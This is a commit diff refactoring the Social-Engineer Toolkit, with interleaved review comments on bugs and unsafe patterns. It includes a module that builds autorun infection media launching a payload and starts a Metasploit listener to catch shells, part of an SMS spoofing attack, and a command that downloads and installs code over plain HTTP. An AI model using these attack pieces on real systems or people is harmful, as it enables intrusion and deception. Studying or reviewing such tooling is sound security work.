Merge pull request #255 from Cabalist/master

More Code Review
trustedsec 2016-07-28 22:28:05 -04:00 committed by GitHub
commit b0541ca7bf
16 changed files with 819 additions and 1663 deletions


@ -3,3 +3,7 @@ pycrypto
requests
pyopenssl
pefile
# Generate QR Codes
qrcode
pillow


@ -1,4 +1,5 @@
#!/usr/bin/env python
# coding=utf-8
import sys
import os
@ -71,50 +72,54 @@ if os.path.isfile(filename):
try:
print("[*] Spawning SET in a threaded process...")
child = pexpect.spawn("python setoolkit")
fileopen = open(filename, "r")
for line in fileopen:
line = line.rstrip()
# if we just use enter send default
if line == "":
line = "default"
with open(filename) as fileopen:
for line in fileopen:
line = line.rstrip()
# if we just use enter send default
if line == "":
line = "default"
match1 = re.search("OMGPASSWORDHERE", line)
if match1:
line = line.replace("OMGPASSWORDHERE", "")
password = True
match1 = re.search("OMGPASSWORDHERE", line)
if match1:
line = line.replace("OMGPASSWORDHERE", "")
password = True
if password is False:
print("[*] Sending command {0} to the interface...".format(line))
if password is True:
print("[*] Sending command [**********] (password masked) to the interface...")
password = False
if password is False:
print("[*] Sending command {0} to the interface...".format(line))
if password is True:
print("[*] Sending command [**********] (password masked) to the interface...")
password = False
if line == "default":
line = ""
if line == "default":
line = ""
if line == "CONTROL-C-HERE":
try:
print("[*] This may take a few seconds while SET catches up...")
child.expect("Next line of the body:")
time.sleep(2)
child.sendline("\n")
child.sendcontrol('c')
if line == "CONTROL-C-HERE":
try:
print("[*] This may take a few seconds while SET catches up...")
child.expect("Next line of the body:")
time.sleep(2)
child.sendline("\n")
child.sendcontrol('c')
# if the user is using pexpect < 2.3
except AttributeError:
print("[-] Error: You are running pexpect < 2.3 which is needed for this function")
choice = input("Would you like to install it now yes or no: ")
if choice == "yes" or choice == "y":
subprocess.Popen(
"wget http://sourceforge.net/projects/pexpect/files/pexpect/Release%202.3/pexpect-2.3.tar.gz;tar -zxvf pexpect-2.3.tar.gz;cd pexpect-2.3;python setup.py install;cd ..;rm -rf pexpect-2*", shell=True).wait()
try:
reload(pexpect)
child.sendcontrol('c')
except:
print("[*] Relaunch the Social-Engineer Toolkit for changes to apply.")
sys.exit()
if line != "CONTROL-C-HERE":
child.sendline(line)
# if the user is using pexpect < 2.3
except AttributeError:
print("[-] Error: You are running pexpect < 2.3 which is needed for this function")
choice = input("Would you like to install it now yes or no: ")
if choice == "yes" or choice == "y":
subprocess.Popen("wget http://sourceforge.net/projects/pexpect/files/pexpect/Release%202.3/pexpect-2.3.tar.gz;"
"tar -zxvf pexpect-2.3.tar.gz;"
"cd pexpect-2.3;"
"python setup.py install;"
"cd ..;"
"rm -rf pexpect-2*", shell=True).wait()
try:
reload(pexpect)
child.sendcontrol('c')
except:
print("[*] Relaunch the Social-Engineer Toolkit for changes to apply.")
sys.exit()
if line != "CONTROL-C-HERE":
child.sendline(line)
print("[*] Finished sending commands, interacting with the interface..")
child.interact()
@ -130,4 +135,4 @@ if os.path.isfile(filename):
# handle everything else
except Exception as e:
print("[*] Something went wrong, printing error: ", e)
print("[*] Something went wrong, printing error: {0}".format(e))
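Review bot: The reflowed pexpect self-install at `subprocess.Popen("wget http://sourceforge.net/.../pexpect-2.3.tar.gz;" ... "python setup.py install;" ...)` still fetches an archive over plain HTTP and runs its `setup.py install` with no checksum or signature check, so whoever controls that download path controls code executed with SET's privileges; dropping the inline install and telling the user to install `python-pexpect` through the package manager (the package `setup.py` in this same commit already installs on Debian) would close that. The recovery path after it calls `reload(pexpect)` inside a bare `except:`; `reload` is a builtin only on Python 2 (Python 3 has `importlib.reload`), so on Python 3 this branch always ends in the "Relaunch" message, and narrowing to `except Exception:` would at least stop the handler from swallowing a `KeyboardInterrupt`. The enclosing `try` starts before this hunk and its handler sits in the next one.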

36
seproxy

@ -7,6 +7,8 @@
import sys
import getpass
import os
import subprocess
import re
import src.core.setcore as core
@ -26,42 +28,34 @@ if operating_system == "posix":
definepath = os.getcwd()
print("\n[*] Welcome to the SET-Proxy Configuration Utility")
print("\nEnter the proxy setting informatiom below.\n\nExample: http://10.3.1.1:8080\n")
print("\nEnter the proxy setting information below.\n\nExample: http://10.3.1.1:8080\n")
try:
proxy = input("Enter the proxy server: ")
username = input(
"Enter the username for the proxy (hit enter for none): ")
password = getpass.getpass(
"Enter the password for the proxy (hit enter for none): ")
username = input("Enter the username for the proxy (hit enter for none): ")
password = getpass.getpass("Enter the password for the proxy (hit enter for none): ")
except KeyboardInterrupt:
print("\n[!] Exiting the Social-Engineer Toolkit.")
sys.exit()
if username != "":
proxy_string = "export http_proxy='http://%s:%s@%s'" % (
username, password, proxy)
proxy_string = "export http_proxy='http://{0}:{1}@{2}'".format(username, password, proxy)
else:
proxy_string = "export http_proxy='http://{0}'".format(proxy)
if username == "":
proxy_string = "export http_proxy='http://%s'" % (proxy)
filewrite = open(core.setdir + "/proxy.config", "w")
filewrite.write(proxy_string)
filewrite.close()
from src.core.set import *
with open(os.path.join(core.setdir, "/proxy.config"), "w") as filewrite:
filewrite.write(proxy_string)
def kill_proc(port, flag):
proc = subprocess.Popen("netstat -antp | grep '%s'" % (port), shell=True, stdout=subprocess.PIPE)
proc = subprocess.Popen("netstat -antp | grep '{0}'".format(port), shell=True, stdout=subprocess.PIPE)
stdout_value = proc.communicate()[0]
a = re.search("\d+/%s" % (flag), stdout_value)
a = re.search("\d+/{0}".format(flag), stdout_value)
if a:
b = a.group()
b = b.replace("/%s" % (flag), "")
subprocess.Popen("kill -9 %s 1> /dev/null 2> /dev/null" %
(b), shell=True).wait()
b = b.replace("/{0}".format(flag), "")
subprocess.Popen("kill -9 {0} 1> /dev/null 2> /dev/null".format(b), shell=True).wait()
# cleans up stale processes from SET
try:
@ -72,7 +66,7 @@ if operating_system == "posix":
# handle errors
except Exception as error:
log(error)
core.log(error)
else:
print("[!] Sorry, this only works on posix (nix) based systems and is not compatible with this operating system.")
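Review bot: `os.path.join(core.setdir, "/proxy.config")` on the new `with open(...)` line discards `core.setdir` entirely, because `os.path.join` drops every preceding component when a later one is absolute, so the proxy settings (including the password) are written to `/proxy.config` at the filesystem root instead of under the SET directory; the leading slash has to go: `with open(os.path.join(core.setdir, "proxy.config"), "w") as filewrite:`. The same leading-slash join is introduced by this commit in setoolkit (`"/set.options"`, `"/Signed_Update.jar"`) and in the autorun module (`"/dll/openthis.wab"`, `"/dll/*"`), where it also turns the `cp` source into an absolute `/dll/*`. Separately, in `kill_proc` the new `re.search("\d+/{0}".format(flag), stdout_value)` should use a raw pattern string, and `proc.communicate()[0]` is `bytes` under Python 3, where a `str` pattern against it raises `TypeError`; which interpreter this file targets is not visible here, so worth confirming.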

102
setoolkit

@ -1,4 +1,5 @@
#!/usr/bin/env python
# coding=utf-8
import os
import re
import shutil
@ -37,7 +38,8 @@ if not os.path.isfile("/etc/setoolkit/set.config"):
shutil.copyfile("src/core/config.baseline", "/etc/setoolkit/set.config")
# here we check to ensure we have the latest version
data = open("/etc/setoolkit/set.config", "r").read()
with open("/etc/setoolkit/set.config") as fileopen:
data = fileopen.read()
if "CONFIG_VERSION=7.2" not in data:
print("[*] Overwriting old config for updates to SET. Backing up your old one in /etc/setoolkit/")
shutil.move("/etc/setoolkit/set.config", "/etc/setoolkit/set.config.bak")
@ -48,7 +50,8 @@ import src.core.setcore as core
from src.core.menu import text
from src.core.update_config import update_config
if os.path.isfile(core.setdir + "/version.lock"): os.remove(core.setdir + "/version.lock")
if os.path.isfile(os.path.join(core.setdir, "version.lock")):
os.remove(os.path.join(core.setdir, "version.lock"))
# check directory and make it
if not os.path.isdir("src/logs/"):
@ -57,9 +60,8 @@ if not os.path.isdir("src/logs/"):
# check set logfile
if not os.path.isfile("src/logs/set_logfile.log"):
# create new log
filewrite = open("src/logs/set_logfile.log", "w")
filewrite.write("")
filewrite.close()
with open("src/logs/set_logfile.log", "w") as filewrite:
filewrite.write("")
# check which operating system
operating_system = core.check_os()
@ -74,15 +76,12 @@ if operating_system == "posix":
if not os.path.isdir(userdir):
os.makedirs(userdir)
if not os.path.isdir(core.setdir + "/reports/"):
os.makedirs(core.setdir + "/reports")
if not os.path.isdir(os.path.join(core.setdir, "reports")):
os.makedirs(os.path.join(core.setdir, "reports"))
# check to see if we have python-pycrypto
try:
from Crypto.Cipher import AES
except ImportError:
print("[!] The python-pycrypto python module not installed. You will lose the ability to use multi-pyinjector.")
pass
@ -102,9 +101,13 @@ update_config()
# chmod routine
if operating_system == "posix":
# change permissions if nix
subprocess.Popen(
"chmod +x seautomate;chmod +x set-update;chmod +x setup.py;chmod +x set-proxy;chmod +x src/payloads/ratte/ratteserver;chmod +x src/payloads/set_payloads/listener.py",
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
subprocess.Popen("chmod +x seautomate;"
"chmod +x set-update;"
"chmod +x setup.py;"
"chmod +x set-proxy;"
"chmod +x src/payloads/ratte/ratteserver;"
"chmod +x src/payloads/set_payloads/listener.py",
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
dns = core.check_config("DNS_SERVER=")
if dns.lower() == "on":
@ -114,8 +117,7 @@ if dns.lower() == "on":
for root, dirs, files in os.walk(core.setdir):
for f in files:
try:
match = re.search(
".svn|entries|all-wcprops|props|text-base|prop-base|tmp", f)
match = re.search(".svn|entries|all-wcprops|props|text-base|prop-base|tmp", f)
if not match:
os.unlink(os.path.join(root, f))
@ -125,8 +127,7 @@ for root, dirs, files in os.walk(core.setdir):
# loop through all the directories
for d in dirs:
try:
match = re.search(
".svn|entries|all-wcprops|props|text-base|prop-base|tmp", d)
match = re.search(".svn|entries|all-wcprops|props|text-base|prop-base|tmp", d)
if not match:
shutil.rmtree(os.path.join(root, d))
except:
@ -135,9 +136,9 @@ for root, dirs, files in os.walk(core.setdir):
# if windows then do some stuff
if operating_system == "posix":
#
# ROOT CHECK
#
#
# ROOT CHECK
#
if os.geteuid() != 0:
print("\n The Social-Engineer Toolkit (SET) - by David Kennedy (ReL1K)")
@ -152,32 +153,38 @@ define_version = core.get_version()
core.cleanup_routine()
# create the set.options routine
filewrite = open(core.setdir + "/set.options", "w")
filewrite.write("{This is the main SET configuration file for all options used in SET}\n")
filewrite.close()
with open(os.path.join(core.setdir, "/set.options"), "w") as filewrite:
filewrite.write("{This is the main SET configuration file for all options used in SET}\n")
try:
# Remove old Signed_Updates
if os.path.isfile(core.setdir + "/Signed_Update.jar"):
os.remove(core.setdir + "/Signed_Update.jar")
if os.path.isfile(os.path.join(core.setdir, "/Signed_Update.jar")):
os.remove(os.path.join(core.setdir, "/Signed_Update.jar"))
# initial user menu
if not os.path.isfile("src/agreement4"):
fileopen = open("readme/LICENSE", "r")
for line in fileopen:
print((line.rstrip()))
with open("readme/LICENSE") as fileopen:
for line in fileopen:
print((line.rstrip()))
print((core.bcolors.RED + """
The Social-Engineer Toolkit is designed purely for good and not evil. If you are planning on using this tool for malicious purposes that are not authorized by the company you are performing assessments for, you are violating the terms of service and license of this toolset. By hitting yes (only one time), you agree to the terms of service and that you will only use this tool for lawful purposes only.""" + core.bcolors.GREEN))
print("{0}The Social-Engineer Toolkit is designed purely"
" for good and not evil. If you are planning on "
"using this tool for malicious purposes that are "
"not authorized by the company you are performing "
"assessments for, you are violating the terms of "
"service and license of this toolset. By hitting "
"yes (only one time), you agree to the terms of "
"service and that you will only use this tool for "
"lawful purposes only.{1}".format(core.bcolors.RED, core.bcolors.ENDC))
print(core.bcolors.GREEN)
choice = input("\nDo you agree to the terms of service [y/n]: ")
choice += " " # b/c method below
if choice[0].lower() == "y":
filewrite = open("src/agreement4", "w")
filewrite.write("user accepted")
filewrite.close()
with open("src/agreement4", "w") as filewrite:
filewrite.write("user accepted")
print(core.bcolors.ENDC)
else:
print((core.bcolors.ENDC + "[!] Exiting the Social-Engineer Toolkit, have a nice day." + core.bcolors.ENDC))
print(core.bcolors.ENDC + "[!] Exiting the Social-Engineer Toolkit, have a nice day." + core.bcolors.ENDC)
sys.exit()
while True:
@ -192,10 +199,8 @@ The Social-Engineer Toolkit is designed purely for good and not evil. If you are
# funny
if main_menu_choice == "hugs":
core.print_warning(
"Have you given someone a hug today? Remember a hug can change the world.")
pause = input(
"\nPlease give someone a hug then press {return} to continue.")
core.print_warning("Have you given someone a hug today? Remember a hug can change the world.")
pause = input("\nPlease give someone a hug then press {return} to continue.")
# funny2
if main_menu_choice == "freehugs":
@ -204,21 +209,17 @@ The Social-Engineer Toolkit is designed purely for good and not evil. If you are
# funny3
if main_menu_choice == "derbycon":
core.print_warning(
core.bcolors.BOLD + "YAYYYYYYYYYYYYYYYYYYYYYY DerbyCon.\n\nDerbyCon 6.0 'Recharge' -- September 23th - 25th 2016" + core.bcolors.ENDC)
pause = input(
core.bcolors.BOLD + "\nDon't miss it! Sep 23 - Sep 25th! Press {return} to continue." + core.bcolors.ENDC)
core.print_warning(core.bcolors.BOLD + "YAYYYYYYYYYYYYYYYYYYYYYY DerbyCon.\n\nDerbyCon 6.0 'Recharge' -- September 23th - 25th 2016" + core.bcolors.ENDC)
pause = input(core.bcolors.BOLD + "\nDon't miss it! Sep 23 - Sep 25th! Press {return} to continue." + core.bcolors.ENDC)
# rance
if main_menu_choice == "rance":
core.print_warning(
core.bcolors.BOLD + "We miss you buddy. David Jones (Rance) changed a lot of us and you'll always be apart of our lives (and SET). Fuck Cancer." + core.bcolors.ENDC)
core.print_warning(core.bcolors.BOLD + "We miss you buddy. David Jones (Rance) changed a lot of us and you'll always be apart of our lives (and SET). Fuck Cancer." + core.bcolors.ENDC)
pause = input("Press {return} to continue.")
# cavs
if main_menu_choice == "cavs":
core.print_warning(
core.bcolors.BOLD + "2015-2016 CHAMPS BABY!!! C l e e e e e e v eeee l a a n n d d d d d d d d d d d " + core.bcolors.ENDC)
core.print_warning(core.bcolors.BOLD + "2015-2016 CHAMPS BABY!!! C l e e e e e e v eeee l a a n n d d d d d d d d d d d " + core.bcolors.ENDC)
pause = input("Press {return} to continue.")
# quit out
@ -268,13 +269,14 @@ The Social-Engineer Toolkit is designed purely for good and not evil. If you are
# handle keyboard interrupts
except KeyboardInterrupt:
print(("\n\nThank you for " + core.bcolors.RED + "shopping" + core.bcolors.ENDC +
" with the Social-Engineer Toolkit.\n\nHack the Gibson...and remember...hugs are worth more than handshakes.\n"))
print(("\n\nThank you for {0}shopping{1} with the Social-Engineer Toolkit."
"\n\nHack the Gibson...and remember...hugs are worth more "
"than handshakes.\n".format(core.bcolors.RED, core.bcolors.ENDC)))
# handle exceptions
except Exception as error:
log(error)
print ("\n\n[!] Something went wrong, printing the error: "+ str(error))
core.log(error)
print("\n\n[!] Something went wrong, printing the error: " + str(error))
# cleanup routine
core.cleanup_routine()
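Review bot: The reflowed `re.search(".svn|entries|all-wcprops|props|text-base|prop-base|tmp", f)` in the cleanup walk keeps an unescaped `.` and an unanchored alternation, so `tmp` or `props` anywhere in a name counts as a match and `.svn` matches any character before `svn`; since every entry under `core.setdir` that does not match is unlinked or `rmtree`d a line later, this pattern decides what survives and deserves to be exact, starting with `re.search(r"\.svn|entries|all-wcprops|props|text-base|prop-base|tmp", f)`. The identical pattern is repeated for directories in the following hunk; hoisting it into one compiled module-level constant would keep the two in step. The `os.walk` loop itself begins before this hunk.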


@ -1,4 +1,5 @@
#!/usr/bin/env python
# coding=utf-8
#
# Python installer
#
@ -36,19 +37,19 @@ if platform.system() == "Linux":
if os.path.isfile("/etc/apt/sources.list"):
# force install of debian packages
subprocess.Popen(
"apt-get --force-yes -y install git apache2 python-requests libapache2-mod-php python-pymssql build-essential python-pexpect python-pefile python-crypto python-openssl", shell=True).wait()
subprocess.Popen("apt-get --force-yes -y install "
"git apache2 python-requests libapache2-mod-php "
"python-pymssql build-essential python-pexpect "
"python-pefile python-crypto python-openssl", shell=True).wait()
# If pacman.conf exists, we have a Arch based system
elif os.path.isfile("/etc/pacman.conf"):
subprocess.Popen(
"pacman -S --noconfirm --needed git python2 python2-beautifulsoup3 python2-pexpect python2-crypto", shell=True).wait()
subprocess.Popen(
"wget https://pefile.googlecode.com/files/pefile-1.2.10-139.tar.gz", shell=True).wait()
subprocess.Popen(
"tar xvfz pefile-1.2.10-139.tar.gz", shell=True).wait()
subprocess.Popen(
"chmod a+x pefile-1.2.10-139/setup.py", shell=True).wait()
subprocess.Popen("pacman -S --noconfirm --needed git python2 "
"python2-beautifulsoup3 python2-pexpect python2-crypto", shell=True).wait()
subprocess.Popen("wget https://pefile.googlecode.com/files/pefile-1.2.10-139.tar.gz", shell=True).wait()
subprocess.Popen("tar xvfz pefile-1.2.10-139.tar.gz", shell=True).wait()
subprocess.Popen("chmod a+x pefile-1.2.10-139/setup.py", shell=True).wait()
subprocess.Popen("rm -rf pefile-1.2.10-139*", shell=True).wait()
# if dnf.conf is there, we are dealing with a >= fedora 22 - added thanks to whoismath pr
@ -58,14 +59,12 @@ if platform.system() == "Linux":
# if sources.list or pacman.conf is not available then we're running
# something offset
else:
print(
"[!] You're not running a Debian, Fedora or Arch variant. Installer not finished for this type of Linux distro.")
print("[!] You're not running a Debian, Fedora or Arch variant. Installer not finished for this type of Linux distro.")
print("[!] Install git, python-pexpect, python-crypto, python-openssl, python-pefile manually for all of SET dependancies.")
sys.exit()
if os.path.isdir("/usr/share/setoolkit"):
print(
"[!] SET is already installed in /usr/share/setoolkit. Remove and start again.")
print("[!] SET is already installed in /usr/share/setoolkit. Remove and start again.")
sys.exit()
if not os.path.isfile("/usr/bin/git"):
@ -77,14 +76,10 @@ if platform.system() == "Linux":
cwdpath = os.getcwd()
subprocess.Popen("cd ..;cp -rf %s /usr/share/setoolkit" % cwdpath, shell=True).wait()
print("[*] Installing setoolkit installer to /usr/bin/setoolkit...")
subprocess.Popen(
"echo #!/bin/bash > /usr/bin/setoolkit", shell=True).wait()
subprocess.Popen(
"echo cd /usr/share/setoolkit >> /usr/bin/setoolkit", shell=True).wait()
subprocess.Popen(
"echo exec python2 setoolkit $@ >> /usr/bin/setoolkit", shell=True).wait()
subprocess.Popen(
"cp /usr/share/setoolkit/seupdate /usr/bin/", shell=True).wait()
subprocess.Popen("echo #!/bin/bash > /usr/bin/setoolkit", shell=True).wait()
subprocess.Popen("echo cd /usr/share/setoolkit >> /usr/bin/setoolkit", shell=True).wait()
subprocess.Popen("echo exec python2 setoolkit $@ >> /usr/bin/setoolkit", shell=True).wait()
subprocess.Popen("cp /usr/share/setoolkit/seupdate /usr/bin/", shell=True).wait()
subprocess.Popen("chmod +x /usr/bin/setoolkit", shell=True).wait()
#print("[*] Note you will manually need to install Core Security 'Impacket'")
#print("[*] Download link: http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=tool&name=Impacket")
@ -93,9 +88,8 @@ if platform.system() == "Linux":
print("[*] We are now finished! To run SET, type setoolkit...")
if platform.system() == 'Darwin':
subprocess.Popen(
"easy_install pexpect pycrypto pyopenssl pefile", shell=True).wait()
subprocess.Popen("easy_install pexpect pycrypto pyopenssl pefile", shell=True).wait()
if platform.system() != "Linux":
if platform.system() != "Darwin":
print("[!] Sorry this installer is not designed for any other system other than Linux and Mac. Please install the Python dependencies manually.")
if platform.system() not in ["Linux", "Darwin"]:
print("[!] Sorry this installer is not designed for any other system other "
"than Linux and Mac. Please install the Python dependencies manually.")
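Review bot: The reflowed wrapper-writing lines do not produce the file they describe: in `subprocess.Popen("echo #!/bin/bash > /usr/bin/setoolkit", shell=True)` the `#` starts a shell comment, so the command is a bare `echo` and nothing is written, and in `"echo exec python2 setoolkit $@ >> /usr/bin/setoolkit"` the `$@` is expanded by the invoking shell (to nothing) rather than written literally. The resulting `/usr/bin/setoolkit` therefore has no shebang and forwards no arguments; an interactive shell will still fall back to running it as a script, but `exec`-style callers such as `subprocess` fail with "Exec format error". Writing the wrapper with ordinary file I/O, as below, avoids both problems and the shell round-trips; the trailing `chmod +x` Popen can then become `os.chmod`.
```python
print("[*] Installing setoolkit installer to /usr/bin/setoolkit...")
wrapper = '#!/bin/bash\ncd /usr/share/setoolkit\nexec python2 setoolkit "$@"\n'
with open("/usr/bin/setoolkit", "w") as filewrite:
    filewrite.write(wrapper)
os.chmod("/usr/bin/setoolkit", 0o755)
# … unchanged: seupdate copy and the remaining messages …
```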


@ -1,11 +1,11 @@
#!/usr/bin/env python
# coding=utf-8
#
# simple git update for set pulling from core modules
#
import os
import sys
import src.core.setcore as core
# check where we are and load default directory
@ -14,17 +14,17 @@ if os.path.isdir("/usr/share/setoolkit"):
os.chdir("/usr/share/setoolkit")
sys.path.append("/usr/share/setoolkit")
import src.core.setcore as core
# if we can't see our config then something didn't go good..
if not os.path.isfile("/etc/setoolkit/set.config"):
core.print_error("Cannot locate SET executable. Try running from the local directory.")
core.print_error("If this does not work, please run the setup.py install file.")
sys.exit()
from src.core.setcore import *
try:
# pull update set from the core libraries
update_set()
core.update_set()
# except keyboard interrupts
except KeyboardInterrupt:
@ -32,4 +32,4 @@ except KeyboardInterrupt:
# handle all other errors
except Exception as e:
print("\n[!] Something went wrong.. Printing the error: {}".format(e))
print("\n[!] Something went wrong.. Printing the error: {0}".format(e))


@ -1,83 +1,93 @@
#!/usr/bin/env python
# coding=utf-8
# simple autorun creation for set
import subprocess
import os
import re
import sys
from src.core.setcore import *
import subprocess
from time import sleep
import src.core.setcore as core
# define metasploit path
definepath = os.getcwd()
msf_path = meta_path()
me = mod_name()
msf_path = core.meta_path()
me = core.mod_name()
autorun_path = os.path.join(core.setdir, "autorun")
trigger = 0
if check_options("INFECTION_MEDIA=") == "ON":
if core.check_options("INFECTION_MEDIA=") == "ON":
trigger = 1
subprocess.Popen("rm -rf %s/autorun/ 1> /dev/null 2> /dev/null;mkdir %s/autorun 1> /dev/null 2> /dev/null;cp %s/payload.exe %s/autorun/program.exe 1> /dev/null 2> /dev/null" %
(setdir, setdir, setdir, setdir), shell=True).wait()
subprocess.Popen("rm -rf {0} 1> /dev/null 2> /dev/null;"
"mkdir {0} 1> /dev/null 2> /dev/null;"
"cp {1} {2} 1> /dev/null 2> /dev/null".format(autorun_path,
os.path.join(core.setdir, "payload.exe"),
os.path.join(autorun_path, "program.exe")),
shell=True).wait()
if os.path.isfile(setdir + "/fileformat.file"):
if os.path.isfile(os.path.join(core.setdir, "fileformat.file")):
trigger = 2
subprocess.Popen("rm -rf %s/autorun/ 1> /dev/null 2> /dev/null;mkdir autorun 1> /dev/null 2> /dev/null;cp %s/template.pdf autorun/ 1> /dev/null 2>/dev/null" %
(setdir, setdir), shell=True).wait()
subprocess.Popen("rm -rf {0} 1> /dev/null 2> /dev/null;"
"mkdir {0} 1> /dev/null 2> /dev/null;"
"cp {1} {0} 1> /dev/null 2>/dev/null".format(autorun_path,
os.path.join(core.setdir, "template.pdf")),
shell=True).wait()
if os.path.isfile(setdir + "/dll/openthis.wab"):
subprocess.Popen("rm -rf %s/autorun/ 1> /dev/null 2> /dev/null;mkdir autorun 1> /dev/null 2> /dev/null;cp %s/dll/* autorun/ 1> /dev/null 2> /dev/null" %
(setdir, setdir), shell=True).wait()
if os.path.isfile(os.path.join(core.setdir, "/dll/openthis.wab")):
subprocess.Popen("rm -rf {0} 1> /dev/null 2> /dev/null;"
"mkdir {0} 1> /dev/null 2> /dev/null;"
"cp {1} {0} 1> /dev/null 2> /dev/null".format(autorun_path,
os.path.join(core.setdir, "/dll/*")),
shell=True).wait()
trigger = 3
if not os.path.isdir(setdir + "/autorun"):
os.makedirs(setdir + "/autorun/")
filewrite = open(setdir + "/autorun/autorun.inf", "w")
if not os.path.isdir(autorun_path):
os.makedirs(autorun_path)
# if using standard payloads
if trigger == 1:
payload = "program.exe" # "" + alpha_data + "\""
with open(os.path.join(autorun_path, "autorun.inf"), 'w') as filewrite:
# if using standard payloads
if trigger == 1:
payload = "program.exe" # "" + alpha_data + "\""
# if using pdf payload
if trigger == 2:
payload = "template.pdf"
# if using pdf payload
elif trigger == 2:
payload = "template.pdf"
if trigger == 3:
payload = "openthis.wab"
elif trigger == 3:
payload = "openthis.wab"
filewrite.write("""[autorun]
open=%s
icon=autorun.ico""" % (payload))
filewrite.close()
print_status(
"Your attack has been created in the SET home directory (/root/.set/) folder 'autorun'")
print_status(
"Note a backup copy of template.pdf is also in /root/.set/template.pdf if needed.")
print_info("Copy the contents of the folder to a CD/DVD/USB to autorun")
else:
payload = ""
filewrite.write("""[autorun]\nopen={0}\nicon=autorun.ico""".format(payload))
core.print_status("Your attack has been created in the SET home directory (/root/.set/) folder 'autorun'")
core.print_status("Note a backup copy of template.pdf is also in /root/.set/template.pdf if needed.")
core.print_info("Copy the contents of the folder to a CD/DVD/USB to autorun")
# if we want to launch payload and automatically create listener
if trigger == 1 or trigger == 2 or trigger == 3:
choice1 = yesno_prompt("0", "Create a listener right now [yes|no]")
if trigger in [1, 2, 3]:
choice1 = core.yesno_prompt("0", "Create a listener right now [yes|no]")
if choice1.lower() == "yes" or choice1.lower() == "y":
# if we used something to create other than solo.py then write out the
# listener
if not os.path.isfile(setdir + "/meta_config"):
filewrite = open(setdir + "/meta_config", "w")
fileopen = open(setdir + "/payload.options", "r")
for line in fileopen:
line = line.split(" ")
filewrite.write("use multi/handler\n")
filewrite.write("set payload " + line[0] + "\n")
filewrite.write("set lhost " + line[1] + "\n")
filewrite.write("set lport " + line[2] + "\n")
filewrite.write("set ExitOnSession false\n")
filewrite.write("exploit -j\r\n\r\n")
filewrite.close()
if not os.path.isfile(os.path.join(core.setdir, "meta_config")):
with open(os.path.join(core.setdir, "meta_config"), 'w') as filewrite, \
open(os.path.join(core.setdir, "payload.options")) as fileopen:
for line in fileopen:
line = line.split(" ")
filewrite.write("use multi/handler\n")
filewrite.write("set payload {0}\n".format(line[0]))
filewrite.write("set lhost {0}\n".format(line[1]))
filewrite.write("set lport {0}\n".format(line[2]))
filewrite.write("set ExitOnSession false\n")
filewrite.write("exploit -j\r\n\r\n")
# create the listener
print_status(
"Launching Metasploit.. This could take a few. Be patient! Or else no shells for you..")
subprocess.Popen("%smsfconsole -r %s/meta_config" %
(msf_path, setdir), shell=True).wait()
core.print_status("Launching Metasploit.. This could take a few. Be patient! Or else no shells for you..")
subprocess.Popen("{0} -r {1}".format(os.path.join(msf_path, "msfconsole"),
os.path.join(core.setdir, "meta_config")),
shell=True).wait()
else:
print_warning("cancelling...")
core.print_warning("cancelling...")
sleep(2)



@ -1,21 +1,26 @@
from src.qrcode.qrcode import *
from src.core.setcore import *
# coding=utf-8
import os
import time
import src.core.setcore as core
import qrcode
# generate the qrcode and save it definition
def gen_qrcode(url):
# generate the qrcode
qr = QRCode(5, QRErrorCorrectLevel.L)
qr.addData(url)
qr = qrcode.QRCode(5, error_correction=qrcode.constants.ERROR_CORRECT_L)
qr.add_data(url)
qr.make()
im = qr.makeImage()
im = qr.make_image()
time.sleep(1)
if os.path.isfile(setdir + "/reports/qrcode_attack.png"):
os.remove(setdir + "/reports/qrcode_attack.png")
qr_img_path = os.path.join(core.setdir, "reports/qrcode_attack.png")
if os.path.isfile(qr_img_path):
os.remove(qr_img_path)
# save the image out
im.save(setdir + "/reports/qrcode_attack.png", format='png')
im.save(qr_img_path, format='png')
# print that its been successful
print_status(
"QRCode has been generated under %s/reports/qrcode_attack.png!" % (setdir))
core.print_status("QRCode has been generated under {0}".format(qr_img_path))
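Review bot: `gen_qrcode` has no docstring, and this hunk replaces both its QR dependency and its path handling, so the contract is worth pinning down now; I would add `"""Render *url* as a QR-code PNG at <core.setdir>/reports/qrcode_attack.png, replacing any earlier file, and print the path."""` directly under the `def` line. The `os.remove` guarded by `os.path.isfile` before `im.save(qr_img_path, format='png')` looks redundant since `save` overwrites, and the `time.sleep(1)` between `make_image()` and the file check has no visible purpose; if either is deliberate, a one-line comment saying why would spare the next reader the question.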


@ -1,35 +1,79 @@
#!/usr/bin/env python
# coding=utf-8
from src.sms.protectedapi import send_sms
import src.core.setcore as core
try:
from src.core.setcore import *
from src.sms.protectedapi import send_sms
import requests
print("""\n ----- The Social-Engineer Toolkit (SET) SMS Spoofing Attack Vector -----\n""")
print("This attack vector relies upon a third party service called www.spoofmytextmessage.com. This is a third party service outside of the control from the Social-Engineer Toolkit. The fine folks over at spoofmytextmessage.com have provided an undocumented API for us to use in order to allow SET to perform the SMS spoofing. You will need to visit https://www.spoofmytextmessage.com and sign up for an account. They example multiple payment methods such as PayPal, Bitcoin, and many more options. Once you purchase your plan that you want, you will need to remember your email address and password used for the account. SET will then handle the rest.\n")
print("In order for this to work you must have an account over at spoofmytextmessage.com\n")
print("Special thanks to Khalil @sehnaoui for testing out the service for me and finding spoofmytextmessage.com\n")
print_error("DISCLAIMER: By submitting yes, you understand that you accept all terms and services from spoofmytextmessage.com and you are fully aware of your countries legal stance on SMS spoofing prior to performing any of these. By accepting yes you fully acknowledge these terms and will not use them for unlawful purposes.")
message = raw_input("\nDo you accept these terms (yes or no): ")
if message == "yes":
print_status("Okay! Moving on - SET needs some information from you in order to spoof the message.")
email = raw_input(setprompt(["7"], "Enter your email address for the spoofmytextmessage.com account"))
pw = raw_input(setprompt(["7"], "Enter your password for the spoofmytextmessage.com account"))
print_status("The next section requires a country code, this is the code you would use to dial to the specific country, for example if I was sending a message to 555-555-5555 to the United States (or from) you would enter +1 below.")
tocountry = raw_input(setprompt(["7"], "Enter the country code for the number you are sending TO (for example U.S would be '+1')[+1]"))
if tocountry == "": tocountry = "+1"
fromcountry = raw_input(setprompt(["7"], "Enter the country code for the number you are sending FROM (for example U.S. would be '+1')[+1]"))
if fromcountry == "": fromcountry = "+1"
tonumber = raw_input(setprompt(["7"], "Enter the number to send the SMS TO - be sure to include country code (example: +15551234567)"))
fromnumber = raw_input(setprompt(["7"], "Enter the number you want to come FROM - be sure to include country code (example: +15551234567)"))
message = raw_input(setprompt(["7"], "Enter the message you want to send via the text message"))
